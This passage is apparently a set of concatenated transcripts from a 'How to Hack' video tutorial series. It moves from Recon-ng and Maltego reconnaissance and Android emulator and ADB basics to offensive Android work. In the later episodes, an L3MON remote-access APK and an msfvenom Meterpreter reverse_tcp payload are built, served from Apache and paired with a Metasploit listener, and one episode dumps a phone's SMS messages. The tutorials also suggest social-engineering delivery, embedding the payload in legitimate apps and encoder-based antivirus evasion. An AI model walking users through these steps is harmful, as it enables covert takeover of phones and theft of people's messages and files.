and it will scan through the domain and find out some information for you. So of course in this case we have a very simple informational website, and we have the IP address of 66.147.244.109. So perhaps we want to start looking and thinking about some of the other modules and capabilities that we can use as part of ReconNG. So what we're going to do is enter marketplace followed by search, and we can try to see whether there are other modules that are going to be a lot more useful for us in terms of finding out more information. So scrolling all the way up, we can actually look at discovery, and there is an information disclosure of interesting files. So what we're going to do is enter marketplace, followed by install, and again followed by the module name and module path. Hit enter on that. This will allow us to load and download and install the module into a Recon-ng. Do a module search, and we can see the information regarding the module, and we can actually do a loading of it. So modules load discovery, and once we do that, enter info, and it will tell you all the parameters and options available. So we are going to define the source again. So in this case, we'll enter the source options set source as loyliangyang.com, and to run, and we'll be able to try to find out more interesting information about this particular web server. And of course, from here, we have robots.txt, sitemap.xml, and we have see all this very interesting information that has been crawled into the web server, and we have identified all this key critical data that's going to be very useful in terms of reconnaissance. So once the check has been in place, once the check has completed, we can actually try to find out what is the admin page of the site. So what we're going to do here is we can see that the files has been downloaded. So we can actually do a right click, and of course we can open another terminal and we can zoom in a little. So all we're going to do is actually cd directly into this directory that has been created, and we can do a cd followed by space, and once we hit enter on that, we can enter ls and we can see all the files available, and we can do a cat http and then followed by robots.txt. So directly from here, we can see there is a wp-admin. So this is one of the key information for us to actually get more details regarding the admin page. So this is a WordPress website. And the next thing we can do is do a cat again. And of course, in this case, we can do a sitemap.xml. And once we hit enter on that, we can see that it's using Jetpack 8.1.1. So we can try to find out vulnerabilities in association with Jetpack 8.1.1. So there are other information we can use in terms of reconnaissance to find out more details about a site, and this can really quickly accelerate the whole pace of identifying vulnerabilities within a web server, within a target machine, within an entire organization. So there you're seeing it, how quickly we could actually get all this information using an interactive shell with ReconNG. And what happened is that you can download those modules and be able to run those modules by specifying the target. And from there, you can get the whole list of information directly from ReconNG, helping you speed up and accelerate the pace of gathering information. So I hope you've learned something valuable in today's tutorial. And if you have any questions, feel free to leave a comment below, and I'll try my best to answer any of those questions. And of course, remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching. Hi, and welcome back to another episode on How to Hack. So today we're going to discuss about reconnaissance. And reconnaissance is one of those phases where if you do a thorough enough and comprehensive enough job, you can actually find out a lot of information about an entity, a person, or an organization. And you can actually look up for a lot of information like the IP addresses, who are the contact points within those domains, where are the subdomains. And one of the really powerful tools within Kali Linux is Meltego. And Meltego gives you a visual graph, a visual representation about all of these findings, and it automates the process of it, helping you find out about all this information very quickly, helping you accelerate the whole pace of looking for all these assets within an corporate or entity that you're looking and hunting towards. So without further ado, let's get started on today's tutorial. So I have Kali Linux running on the background as a virtual machine, and we can go onto the top left on information gathering, and we can click on Meltego. So if you have been watching and following the channel, you will realize that we have gone through a lot of the information gathering applications that are available here. So it's great. So Meltego is going to be one of those tools that we have not discussed yet, and we're going to launch it over here. So while it is launching and starting the modules, there's a couple of things I really want to go through with you. So there is a Google hacking database, because today's discussion is primarily on reconnaissance and information gathering. So here we have Google hacking database under exploitdb.com. So when you go here, you have different kind of categories that you can actually input those values into the Google search engine. And from there on, you'll be able to get and extract a lot of valuable data. And the next I want to share with you is netcraft.com. So again, if you want to find out more information about a website, Netcraft, their crawlers, their bots are already out there looking at the websites, looking at the services that's running on top of the website. So it really speeds up the whole process and accelerate the pace of looking for potential IT devices, the services associated with it, and many other capabilities. So for example, if I enter loyliangyang.com and I click on find out what any site is running and I click go ahead, it will actually look at the existing data or the database of information that they have when they were scanning on the website. So this really makes a lot of sense. And once you do that, it's going to transfer some data for you. So if you look at some of the applications in the information gathering, phase, you see that there's a lot of them actually looking up some of this publicly available information to actually find out more details about a website, about an entity, about an organization. So in this case, when we are looking at Meltego, of course, we are looking at the community edition. So here you have the Transform Harp, and then you have Meltego Colleagues Edition, so you can follow the user. There's a lot of really wonderful services, or Transform they call it. They can help you find out more data. So the first thing you want to do is you want to go in the top left corner and create a new graph. So as you're creating a new graph, you will see that on the left side you have the palette, on the right side you have all the more intricate details about what you can do to a particular website, a domain, and so on. So I'm going to drag and drop the website over into the central graph, and we can change the website domain name and so on, and you'll be able to look for more details. So you can do a right click, and then you can look for mirror email addresses file. So we're trying to find out all the email addresses within the website Pateva.com. And from here on, you can see there's a lot of information about a particular website, as well as the domain name and likewise. So when you right click on it and you look at Run Transforms, there's a lot of other things that you can try to find out for you automatically, speeding up the whole process of identifying all these IT assets and information within Pateva. So it's really, really important that you use such tools to help you automate it and visualize what kind of IT assets they are, and then you'll be able to further your remuneration if you're looking at the other capabilities within a site. So here we have CipherTrace, we have Shadow Dragon, we have FireEye.com, and so on. So we see so many different email addresses related to it. So here you can look at the required inputs for padding. You can look at different capabilities to IP addresses, to server technology. So when you right click and look at the server technology, it will tell you what kind of version they're using on. Is it on Apache, OpenSSL, Google Apps for Business, Ubuntu as a operating system? So that's really key too. And again, you have relationships, you have information over here. So last seen 2011, first seen 2011, last seen 2019, and it's running on Ubuntu server. It's on PHP. So again, if you look at the capabilities here, and then you can map out your attack methods and activities to go after the website. So that really helps you accelerate the whole pace of attacking the system and the entities to find out more information. So there you're seeing it, how quickly we could gather information about an entity in place, and then how we can look at different kind of profiles using different kind of internet services to actually help us find out more information about the target entity. So this is really critical because the whole idea is to accelerate the pace of reconnaissance. And it is critical that we are able to find out all this information automatically, and Meltego could help us do just that very quickly. And not only that, there are also other services, additional capabilities, report generation, graph visualization that you can look at that could really give us an idea about how an organization operates on the digital landscape or the identity of a person. And then from there on, we can really think about how we want to go after the attack, because we want to look for loopholes, we want to look for vulnerabilities, an unpatched system, an unpatched service, potential dormant accounts that we can log into through secure shell, and so on. So this is one of the key areas where we want to explore in terms of reconnaissance. So once again, thank you so much for watching, and I hope you learned something valuable today. If you have any questions, leave a comment below. And if you like what you just watched, remember to share, like, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorials. Thank you so much once again for watching. Hi, and welcome back to another episode on How to Hack. So over here, I have a Windows operating system running. And of course, once you have Android Studio installed and deployed in your Microsoft operating system, you can go ahead and launch it. So I have already installed the Android Studio. So Android Studio is, of course, powered by IntelliJ platform. It's used for you to develop your mobile application on top of Android, and you can do a lot of testing on it. And it's a wonderful way for you to test out, deploy, trial many of your application, test out the functions of it. and even be able to look at some of the APK packages and break it down and be able to look out for any interesting things about the APK file. So anyway, the first thing you want to look at is go into the top left corner, go under File, under Settings, and in Settings, you want to be able to ensure that you have Android SDK being installed inside your Android Studio. So once you have it here, like what we see, Android 6.0, Android 5.1, and of course, you can also install the rest of the Android, depending if you want to run it or not. So if you're running on some of the latest Android devices and you have the ability to test it out on your new APK installation, you can go and test that out. So moving forward, you also want to go into the tools of AVD Manager. So you can go under AVD Manager, which stands for Android Virtual Device Manager. And once you're in, you'll be able to see here that we can actually create virtual device. So over here, I already have one device. So it is running on x86. It has 3.9 gigabyte on its disk. And of course, we have the target of Android 10.0 and the resolution is what's the name. And of course, you go to the bottom left of the new dialog box or the new window, click Create Virtual Device. And once you click on it, you'll be able to select the kind of platform you want. So you got TV, you got phone, you got Wear OS, tablet, and automotive. So of course, in today's case, in today's tutorial, we'll be looking at the phone, Android mobile device. So you can go ahead and select any of the Android devices that you want to test it out on. So of course, in this case, we can say, for example, Pixel 3, and we can click on Next. So it will specify the size, the ratio, the density, and we can click Next on that. And now we have to select the kind of system image that we'll be using. So in this case, I have already downloaded Q, which is Android 10.0, and I also have Android 6.0 and Android 5.1. So in this case, I'll be using and selecting Android 10.0 to be running on our new operating system or our new device. So click Next on that. And of course, you have to name the device. So of course, here we have the Pixel 3 XL, and we got Android 10.0. It's going to run on portrait. And of course, the emulated performance, I'll just go ahead and let it be running on automatic. And once we're done on that, you can also click on Show Advanced Settings if you want to change some of the more advanced configuration, which I think can be explored in further tutorials. So of course, we got a RAM of 1536, VM heap, internal storage, and so on. So once we're done, click Finish. And once we're finished, we can go ahead and actually launch the new system. So all you got to do is go into the right side and click Launch this AVD in the emulator. Click Run on that, and it would start up the Android emulator for you. So here you can see we got an Android emulator running, and of course we can actually be able to see the startup screen, be able to see it running. So here we can actually pull it over into the middle. So here we can see it's powered by Android. It's running the startup screen, and we can see the device. So if you're building your APK files, you're running some kind of test on Android mobile devices, you'll be able to use this emulator to actually help you test out your APK files. Or if you just want to run a mobile device on your Microsoft operating system, you can just launch it directly from Android Studio. So the great thing about this platform is that on the right side, you can actually click on More. And when you click on More, there's a lot of changes that you can actually specify. So in this case, for example, you can specify the location. So of course, I can enter Singapore, and this would actually change the location of the device. So when I click on it, and this would actually be able to set the location for us. So that's great, because if you're testing out, you are trying to surf the net from different places, you can change the location directly from here. And of course, we got a display setting. So of course, we can add secondary display. And of course, we can apply the changes and so on. And of course, we got cellular. So you can specify the network type, GSM, full LTE, and so on. So depending on what kind of connection you're trying to test, what kind of configuration you're trying to test. And of course, signal strength, of course, right now is being set to moderate. So if you look onto the screen, you can see that we got a huff on the signal strength. So if I change it to great, then of course, when we click on to apply, it would actually change the signal strength inside the particular mobile device. And of course, we got battery, and we can change the level of the battery as well, the charger connection. So a lot of capabilities for you to test out in terms of configuration of it. And of course, camera wise, we can also do the same. So of course, on my desktop, I don't have a web camera, else you will be able to apply it directly inside the system too. And in terms of phone, you can change the number coming from, you can call devices, you can send SMS. And what about the directional pad? So of course, this emulated device does not have for a directional pad. You can change that too. And microphone, we can also set it whether a headphone is being plugged into the Android device. And what about fingerprint? We can also do the changes on the sensor of the fingerprint. And of course, we got virtual sensors. So virtual sensors, you can actually be able to change the rotation of it. So here we can see the accelerometer, the gyroscope, and so on. So all these are changes that you can specify in the system. And ultimately, if you uncover any problems with the system, you can absolutely send a notification over directly into the Android team, and they will take a look at it. And of course, when you're testing your system, you can also save the snapshots of the Android device. So if you're working on it now, it's a fresh device, you want to save the information for it here. Before you make any applied changes, you can do and save those snapshots here. And of course, we got record and playback too. So we can start recording of the screen. If you're surfing the net, testing our APK file, you need to send the file or MP4 format over into different file locations. You can use it to save those settings to look at potentially what you're experimenting inside the Android device here. And here, of course, we got settings, so you can change the window theme, enable the clipboard sharing, so you can save text over on your Windows operating system and save it into your Android device as well. So again, a lot of other capabilities here, and there's a lot of shortcut keys that you can look at. And once we have all this information, we can go back into the Android device, and we can launch, for example, Google Chrome. And we can actually accept and continue, and we can click no thanks for sign in first. So we can actually go into, say, for example, google.com to test out whether we have the internet connection coming in. So once you hit enter on that, we'll be able to access the web browser. And of course, there's a lot more things that we can explore further on in subsequent tutorials about how we can manipulate and make changes into the Android device, install APK files into it, do some kind of capabilities that could actually help us be able to do a lot more changes to the phone. So I hope you learned something valuable in today's tutorial. And if you have any questions, feel free to leave a comment below, and I'll try my best to answer any of your queries. And remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching. Hi, and welcome back to another episode. So today we'll be learning about how we could actually run Android applications inside your personal computer. So right here, we got a APK file on WhatsApp Messenger. So you can go ahead and download it on any of these sites. So once I have downloaded it, I could actually see it on my desktop. So I save it into the desktop. And of course, the next thing you do is go into command prompt. And you can actually cd into desktop, and you can enter dir. So that would actually show that we got a WhatsApp file right here, which is of course about 37.9 megabyte. So the next thing we can do is actually go into Android Studio. So you go ahead and launch Android Studio. So if you have not already installed it, go ahead and install it. And it is powered by IntelliJ platform. So Android Studio helps you program and develop Android applications like APK files and so on. And you could also change some of the configurations on the Android APK. So the next thing we'll do right now is actually go under Tools, and you go under AVD Manager. So once you click on it, this would actually launch the Android Virtual Device Manager. So it is a list of Android devices or emulators that are actually running inside your personal computer, and you could test out all these different kind of APK files inside your personal computer. So in this case, we got Pixel 3 XL, and we also got Pixel XL. So I will go ahead and actually start up on the Pixel XL. So you click onto the arrow button. So this would launch this AVD in the emulator. So you click on that, and that would immediately boot up the Android device. So once we have it, the next thing we got to do is click under Settings, and you go under the settings of the extended controls. So once you click on the settings, you can see that we have the Use Detected ADB Location. So once you have that confirmed, all you got to do is go back into your command prompt, and you can actually enter ADB devices, and this would list
all the Android debug breached devices. So Android debug breach allows you to remotely control and to be able to push the configurations into the Android device. So that is a very important way for us to actually manage and be able to make changes into your Android devices. So the next thing we'll do is to be able to actually control and push down the APK file. So the first thing you're going to do is enter ADB followed by -s and followed by the emulator name. So in this case, it's emulator-5554 and followed by the install, followed by the name of WhatsApp APK. So you got to follow the full name of the APK file once you're in the path or directory. So go ahead and hit enter on that, and that will commence the installation. So once you hit that, it will install and download the APK file into the Android device. And once it is downloaded, it will install it. So here we see a success statement, and a success statement means that the device has been installed successfully. So with that in mind, we can actually go back into the Android emulator. So we are back here. So in the Android emulator, you can actually scroll down and you can actually look at some of the settings and configurations. So in this case, for example, I can actually go into the settings page. So at the bottom right, you can click on the settings and you can actually click on the apps and notifications. So you go ahead and click on that, and we can actually see all 27 apps as part of this Android emulator or Android device. So again, it could also work for your physical Android device. So we can click on see all 27 apps. And of course, as you scroll down, since WhatsApp is actually more at the bottom, you can actually go around there. And once you go over to the bottom, you can see WhatsApp and you can double click on it. And of course, we can see the configuration settings of WhatsApp, and we can see notification, permissions, whether it's granted or not, and you can click open on it because it has been installed. So once you open it up, again, it could be any APK file, and you'll be able to run it inside your personal computer. So I hope you've learned something valuable in today's tutorial. And if you have any questions, feel free to leave a comment below, and I'll try my best to answer any of your questions. So remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial or any tutorials related to technology. Thank you so much once again for watching.
So we're now on the Android debug breach tutorial. So of course, it is a highly versatile command line tool that lets you communicate with a device. So it could be any Android device running on different kind of manufacturers. And of course, there's a lot of actions and options for you to do, and commands and features that you can run directly from your computer's terminal, all the way injecting instructions into the mobile device. So of course, there are three key components: a client, a daemon, and a server. So we will go through the tutorial of all three of this. So make sure that your Android device is already connected into your computer using a USB line. So once you're in, we can actually go into terminal, and all you got to do is enter ADB to make sure that you have ADB installed. So in this case, once I hit ADB, I'll be able to see that I actually have all the commands, all the modules installed. So when you hit ADB, it will show up the help page, so you can see all the commands of it. So we will go through extensively on quite a number of them. That's really useful and helpful in terms of managing Android devices. At the same time, also, if you are a programmer or developer and you want to look at what are some of the libraries already available on Android by default, you want to use some of the features inside the phone, this could really help you in accelerating the pace of understanding what's going on in the Android device and what you can do to actually manage those Android devices. So moving forward, of course, the couple of really interesting things that we want to look at is on ADB. So once you hit ADB, enter ADB devices, and this would actually show all the devices attached to your computer. So in this case, I got one device attached. And of course, once you have the device attached, you can actually go ahead and issue commands into the Android device once it is connected. So one of the commands that we can actually use is to actually look at what are some of the information or the shell that we want to put into the system. So when we enter ADB shell, this would actually bring us into the Android device. And when we enter, say, ls-l, we can see that we can see all the directories, subdirectories inside the existing working directory. So we enter pwd. So as I have mentioned in many tutorials, Android device is like a Linux variant or Linux distribution. A lot of the commands actually come out of box with it. So let's say we enter into CD, SD card, we can enter ls-l, so we can see all the other information here, all the subdirectories. So even on the left side, you could see that there is an indication of directory, the read-write access, and the ability for you to look at owner, group, and others in terms of the permissions to execute, to read, and to write into those subdirectories and files. So this is really helpful. And if you want to see all the list of commands that you can actually use on, you can enter adb followed by shell ls on system/bin. So this will list down all the commands that you can actually issue out inside your Android device. So this is really helpful. And in future tutorial, we'll actually look at how we could start up services. So we could actually kind of convert your Android device into a server, and the server could run multiple services. And if you see some of the commands that we can see here directly, we will be able to see a lot of other key capabilities. And one really important one that we'll be using a lot in future tutorials would actually be on Netcat. So Netcat is available over here, as you can see. So Netcat is going to be one of those commands that we'll be using to boot up services, to interact separately from the Android device debugger or Android debug breach. And over here, there's a lot of other capabilities that you can look at in terms of managing the Android device. So moving forward, we also want to think about how else we can actually manage the Android device. So there is a activity manager too. So activity manager can actually help us see what are some of the information running inside the system, and we can monitor and so on. So all you got to do is actually enter adb shell am and followed by all the other commands that you can see from here. So here we can actually see what are the items that you can key inside am. So it is a activity monitor, so we can look at profile, dump heap, and so on, profile start, and all these other capabilities to actually help us manage some of these services or the activities inside the Android device. So of course, moving forward, we will also be looking at PM, which is a package manager. So all you gotta do is enter adb shell PM, and of course you can enter list packages. And when you enter list packages, it will list all the packages currently inside the Android device. So of course we got Samsung, we got the Google, we got a lot of other information, we got captive portal login, and so on. So all these are the packages that are already available inside your Android mobile device. And of course, we can also look at permissions. We can list features. So instead of listing packages, we can enter list features to see what are some of the features that's available inside your Android device. And when you are coding out a mobile application, you can actually see or use like fingerprint, motion recognition, and so on as part of your mobile application development. So you know that majority of Android devices would have such features available, and you can code them out in your mobile application. Likewise for libraries. So when we list libraries, we can actually see what are the libraries available that we can actually leverage on as you build your mobile application. So over here, we can see like key store, S camera, and so on, and rotation. So all these are actually really important in helping you find out more about how you can manage many of these libraries. And of course, moving forward, we can also look at the device policy manager. So when we enter adb shell followed by dpm, so this is the device policy manager. And of course, there are specific policies, so I'm not going to change any of the policies inside my current mobile device. So here we can see we can set the active admin, device owner, profile owner, and so on. So again, do try them out. Or if you want to look at security logs, force security logs, and you'll be able to retrieve all the security logs directly inside your mobile device. And of course, that's also a key capability in terms of taking a screen cap. So all you gotta do is enter shell, adb shell, screen cap, and then we can say we want to put the screen cap inside SD card. So we can put /SD card, and then we can call it screencap.png. So once you do this, it will take a screenshot of the screen currently, and we can actually do a pull of the file. So we can enter adp pull /SD card /screencap.png. So once you hit that adb pull, this would actually download the file directly into your desktop or your current working directory. So here we can see that the file is empty. So which means that it is actually a blank, it's a locked screen. So what I can do is I can do it again, but this time around I unlock the phone. And once I unlock the phone, all I gotta do is issue out the command again. And once I issue out the command, I can actually do a pull again. And of course here, we can actually do a pull. And of course, this time around, I can do a pull and we can update the file again. And in this case, once I open it up, I can see that we got a screen capture directly. So these are some of the ways that you can actually manage the Android device. And this is it for a basic tutorial on Android debug breach. So do like, share, and subscribe to the channel so that you can be kept abreast of all the upcoming exciting videos that we have running for you. Hi, and welcome back to another episode on How to Hack. So today we're discussing about the use of Android management system so that you can access any of your Android devices from any parts of the world. So what happened is that you could be having an Android tablet, Android mobile devices, Android operating system, and so on, and we'll be able to manage them remotely. They can help us manage hundreds of devices, looking into the content of the device, and very quickly you can actually manage all these devices on a scalable approach. So without further ado, let us get started on today's tutorial. Hi, so over here we have github.com and we are in L3MON. So of course, as you scroll down, you can see the key features and understand that this is a Android management suite powered by Node.js. So you can install it on any Windows system or Kali Linux as well. And of course, as you scroll down, you can see the key features like GPS, view contacts, and so on. A lot of very powerful commands that you can use alongside with it. And some of the prerequisites are Java Runtime 8, Node.js, and a server. So again, like I mentioned earlier, a server could be a Windows server, could be a Linux server. And here you have the installation instructions. So I have already went ahead and completed the installation. So of course, once we go back into Kali Linux, I can open up terminal here. And I've actually installed it directly into the TAM folder, TMP. So we can cd into TMP. So once we have cd into TMP, we can enter ls, and of course we can go directly into Lemon, cd_l3. So once we're in, we can enter ls again, and we can see some of the key information here. And of course, we see that with index.js, we get package.json and assets and so on, many other key capabilities. So going back into the Lemon, all we got to do is actually enter the HTTP of the server IP followed by the port of 22533. So this is the key information we'll be using to access directly into the server once you have started the service. So we can go ahead and enter the IP address of Kali Linux. So of course, in this case, we got going back to terminal, we can enter IP-addr, and we can see that the IP address is 192.168.1.1.8. So we can go ahead and enter 192.168.1.1.8 followed by port 22533. Hit enter on that and you'll be brought into the admin page. And of course, the admin username and password is defined in the configuration file. Log in directly, and of course, we can see the devices page. And previously, we have offline of the particular Samsung that I have installed earlier. And what's really important is about the APK builder. So what we're going to do is enter 192.168.1.1.8. So this is the server that will be hosting the file of L3 Lemon Manager, and from here we'll be able to manage the Android device. So go ahead and click build, and it will take some time for the build to complete, and it's decompiling, patching server information, compiling APK, signing off the APK, verifying the build, and finalizing now. So once the build or the APK has been finalized, you can go directly into terminal, and once we're in terminal, we can enter ls, and we can go into cd assets, enter ls again, and we can cd into web public. And once you're in web public, enter ls, and we can see that we have two APK files. So the most important one is actually the build.s.apk. So if I enter ls-l, we can see the file size as well as the key information regarding the APK file. So what we'll do is we'll do a sudo copy build.s.apk followed by var www.html. And once we have done that, we can enter the password for the current user account, hit enter on that, and then we can go into cd var www.html. And once we're in, we can enter ls-l. So we're serving the file for the user to download or any of your Android device that you are going to manage. So if you're managing tablets, Android tablets, or Android mobile devices, you can actually serve it through a web application server. So going back into the Android device on the right side, we can actually open up, say, Firefox. So going to the right side, we can go into the Android device and we can go into Firefox or any of your favorite browser, open it up, and all we got to do is enter the IP address of the web server, 192.168.1. Of course, we can see the IP address directly from here, which is .18, followed by /build.s.apk. And once you do that, it will download the file, and we can click on download to download the file immediately. And once it has been downloaded, we can open it up. And once we click open on it, we will be able to run the commands and to manage the device directly from here. So we click on downloads, we click on build.s.2.apk. Do you want to install this application? Click install. And once you're done completing the installation of the application, you can click open. And of course, we can click on all permissions. So here we can click on no permissions and we can allow all the permissions directly into the Android device. So again, this could be because you need to manage thousands or hundreds of Android devices, whether tablets, whether you bring your own device and so on, and you want to be able to manage them, and you want to enable the permission so that you have constant access directly into the system. Going back into Kali Linux, we can click under devices. And in devices, we can see what is the device that is being managed, and we can click manage on it. So on the left side, we can see key information like the first scene as well as the last scene. And we can click on GPS, contacts, call log, clip part log, notification log, SMS manager. So for example, if I click on Wi-Fi manager and I click update, so we can get more information regarding the Wi-Fi that is connected into the system, as well as the current Wi-Fi that is available within the vicinity. So over here, we can see a lot of other key information. We can also click on File Explorer to find out more information regarding all the directories within the Android device. So here we can see all the other information, and we can open it up and we can see some of the key sensitive data as well, and we can manage all directly from here. So there you've seen it, how quickly we could actually manage an Android device by installing the APK file and then allowing the permission into the Android device. And directly from there, you'll be able to do a lot more key capabilities and features to manage the Android device. So let us know what are some of the key capabilities you have used from Lemon, and let us know what are the features that you're looking at and how you're using it to manage your Android devices. And I'll try my best to answer any of your queries on the below comment section. So remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching. Hey guys, welcome back to another episode on How to Hack. So my name is Yang and I'll be your trainer and facilitator today. So over here on the screen, as you can see, on the left side we have an mobile device running, and on the right side we have Kali Linux running. So Kali Linux will be our hacker's box, and the mobile device will be the targeted computer or the targeted device that we'll be going after to pull out all of those text messages. So what we are going to do now is, on the right side, we have to create the payload. We have to create the APK file. So what you can see over here is that I have already created a command for you. So we just got to zoom in a little and I will explain to you what all this means. So we're using MSF Venom. So this is part of the Metasploit framework. And of course, -P stands for platform. So we're using Android Meterpreter reverse _ TCP. So a reverse Meterpreter shell for us to get a reverse connection into the mobile device. And of course, we have lhost. So lhost is actually the IP address of the listener. So in this case, if I enter IP space ADDR and I hit enter on that, I will be presented with the IP address of the Kali Linux machine. So in this case, we have 192.168.0.106. And of course, for our case, we are going to create the APK file based on the L port of 4444. So of course, we'll output the file into /hacker.apk. So once you have this instruction ready, paste it onto your Kali Linux box in the command prompt or in the terminal and go ahead and hit enter on that. So I'll go ahead and hit enter on that. And of course, I'll be prompted with the password because I'm using sudo for super user. So hit enter on that. And this would create the APK payload. So what we are going to do is that we need to have this installed into the device. One, installation onto the device either as a corporate issue or a company issue device, or two, it is through social engineering attacks, or you could embed it as part of a different APK file, like your different kind of applications that you can then present it to the user and the user could download it, and from there on you will be able to get it running and you can have the reverse connection back to the device. So over here, as we can see, we have the payload size of 10,185 bytes. So all you got to do is transfer the file. So you can actually do a sudo move, for example, and we can move the /hacker.apk file to var www.html. So what we are doing this and why we're doing this is because we need a location to service the file so that people can access it, so that the target computers can access it, they can download it, and they can install it from there on. So in this case, we can go ahead and run the Apache web server. So all you got to do is enter system, CTL. So this is part of Linux system administration. So this is a good command or good item to learn so that you can understand how you can control different kind of services inside your different Linux boxes. So this is a highly sought after skill, Linux administration. So we enter system CTL followed by space, and we can actually enter the status of Apache. So we can go ahead and hit enter on that. So it says that it is already running. So we have our web application server running. And on the left side, we have the mobile device. So of course, the APK can be downloaded from many places. And I just created a YouTube post about the importance of social engineering. So social engineering is a domain that is usually overlooked. So there are a lot of importance for it because I've seen a lot of demonstration as well as real life cases where the hackers provide a macro Excel file, like an Excel sheet or a Word document, and the user enable the macro scripts, and that continued running, and that took over the entire device very, very quickly. So those were the kind of attacks that we're seeing regularly to penetrate into very large companies. So these are the kind of tricks coupled with technological advancement in cyber attacks to actually launch those attacks against certain entities. All right. So now all we got to do is enter the IP address. So in this case, we have 192.168.0.106/ followed by hacker. And of course, we name our device over here from the output as hacker.apk. So we can enter hacker.apk and hit enter on that. So it would say that we can download the file. So we go ahead and download the file, click OK. So once the file has been downloaded, you can open it up and you can install it. So what I'm going to do now on the right side is I'm going to start up Metasploit console. So again, if you think about some of the use cases for us to install the software into the device, what the hackers are doing is that they're installing a lot of such software onto the mobile device before they actually ship it to the consumers, before they actually sell it through different kind of platforms in order for users to use that phone. And when the users use the phone, they are clueless. They have no idea that this phone already has a virus or a backdoor installed into the device. So these are the kind of tricks that the hackers are already using. So like I mentioned earlier, coupling social engineering as well as all this technical know-hows for the hackers to gain access to your credentials. All right. So moving forward, all I got to do is enter use exploit multi-handler, and we can actually set the payload as Android meter preader reverse underscore TCP. All right, and we can enter show options. So we can set the L host as 192.168.0.106. So this is the IP address of the listener. This is the IP address of Kali Linux in this case. So hit enter on that, and we have the L port as 4444. So everything is set properly. So all we got to do right now is enter exploit to run the listener. So we're listening right now, and we actually already have the software installed. So if I click onto the hacker APK, and you can see that this is an installation update to the existing application. So we have already installed the application. So all I got to do is go back into the mobile device, and if I go into the application page, all I got to do is search out for main activity. So again, the naming, the logos, the way the look and the feel of the application can be modified, and we will discuss about how we can embed such payloads into different kind of APK or different kind of applications. All right. So here I'm just going to go ahead and click on main activity, and immediately we would have access into the session. And what you're seeing right now is that you would not be able to visually see any kind of differences on the phone. So the phone is still able to run as per normal, and it can still surf the internet. You can still go to Google Maps. You can use many different of the features and functions as though your phone is as it is, but it has already been hacked by the hackers, and the hackers on the right side in Kali Linux have full control and access to the device. And why is that the case? So let us explain a little more about why this is the case. So if I actually go under settings and I click onto the applications. So let us go into the application that has been installed in the device, so we can review the mobile application permissions. So if I click under apps, and over here we can see all the applications. So let us go into the application that we just installed. So it is called main activity, and let's hit enter on that. And we can look under permissions. So permissions is on the third row, so go ahead and click on that. And we can see that this application has all these different accesses into the phone. So it has the camera access, it has the contacts access, location, microphone, phone, SMS, and storage. So it means that even for mobile applications that you install into your phone right now, the user or the owner of the application, if they have all these app permissions, they will be able to see all of your data. They'll be able to pull out your contacts, your SMSs, and all this important information. So going back into the Hackers box, we can enter help. And this will list out all the commands available for us to troll or to execute into the mobile device. So in my case, for example, I can enter app_list. So this would show us all the applications that are already installed inside the device. And we can see, for example, if you manage to break into one of the corporate devices owned by an enterprise, then you realize that such application could be mirrored across all those different devices. And many large enterprises run thousands, tens of thousands of devices. So not just in terms of security controls and policies for your mobile devices, but what about your laptops? What about your servers? What about your network devices and so on? So all these different kind of security policies have to have a strong effect across all these different devices that you run in order to secure them against many of these potential hack. So of course, the main topic for today is dump_SMS. So with a very simple command, all you got to do is hit enter on that. And immediately you see that we have a file created onto our desktop over here on the left side. And immediately we can just open it up and we can see all of the text messages. So go ahead and open it up. And over here, we can see can transfer $500,000 for our cybersecurity project. And let's go back into the mobile device and we can click under the messages. And immediately you can see that there is a text message, an outgoing text message can transfer $500,000 here for our cybersecurity project. So there are a lot more instructions. There's a lot more commands that we can do as part of this Android hacking series. So do watch out, do stay tuned for more tutorials for you. So if you have learned something valuable in today's tutorial, remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching. So on the left side of the screen, I've called Linux running, and we can go ahead and open up terminal. And of course, once we're in terminal, we can actually zoom it a little so it's easier for you to see. And of course, we can enter ifconfig, and we can see the IP address is 192.168.1.14. So this will be the attacker's machine. And on the right side, of course, I actually have the Android device running, and of course, we can open a browser. We can surf the internet, and of course, it's connected via network address translation. So we'll definitely need a reverse shell in order to gain access into the system. So going back into Kali Linux, the first thing we need to do is to create the payload, the APK payload. So you can go ahead and use MSF Venom. So when you hit MSF Venom, it would actually show up all the parameters that you need to key in order to generate a file. And a number of key you want to really think about is in terms of some of the advanced options like encryption and coders and so on. So these are the ways that you can actually do to actually help you bypass some of the anti-malware services that are actually installed by default on many of the Android devices now. So again, this is more of the advanced topics that we'll be exploring later on as part of this channel. So moving forward, all you gotta do is enter MSF Venom, and it's very quick for you to actually generate the APK file. So of course, the first thing we want to do is to specify the kind of platform that will be used. So of course, in the payload and Android, MetaPreter, reverse_TCP. And of course, we have to key in the L host as well as the L port, so we can open up another terminal. And of course, we can zoom in a little. And we can enter ifconfig, so we see the IP address is 192.168.1.14. And we can enter equal 192.168.1.14. And L port, we can use, say, 1234. And of course, we want to output the file. So we can actually output the file into, say, current directory. And we can actually call it, say, mobile app.apk. And hit enter on that. So this would generate the file into the current directory. And it's usually about 10,000 kilobytes. And of course, in the future, we will also discuss about how we can embed the payload into a normal APK file using APK tools and so on. So once we have the file generated, we can see it over here that we have the mobile app.apk. So the next thing we will do is actually to move the file into a Apache web server. So we can enter move mobile app.apk to var www.html. So this is the place which houses all the files, index.html and so on for your Apache web server. So go ahead and hit that. And of course, we will need to sudo because we're using the latest copy of Kali Linux. So of course, we got to key in our password. And once we do that, we'll be able to change and copy the file over or move the file into the var www.html directory. And once that is done, what we will have to do is to move on and be able to start up the server. So we can enter MSF console. And once we hit MSF console, this would start up the Metasploit framework. And of course, we have to be able to run the listener so that once the user download the app, install the app, and launch the app or open the app, we'll be able to gain a shell. So moving forward, what we got to do is actually to start up the listener. So all you got to do is use exploit multi-handler. And once you do that, all you got to do is set payload Android meterpreter reverse underscore TCP. So there's a lot of other payloads that you can use alongside with it. You could do a direct shell, you could do a reverse HTTPS, HTTP, and so on. So in this case, we use TCP. So of course, in the future tutorials, we also discuss about what are the differences between HTTPS, HTTP, TCP, and so on. So those are fundamentals and foundational understanding of the payloads and the network connection types that we'll be using. So moving forward, once we set the payload, all we got to do is 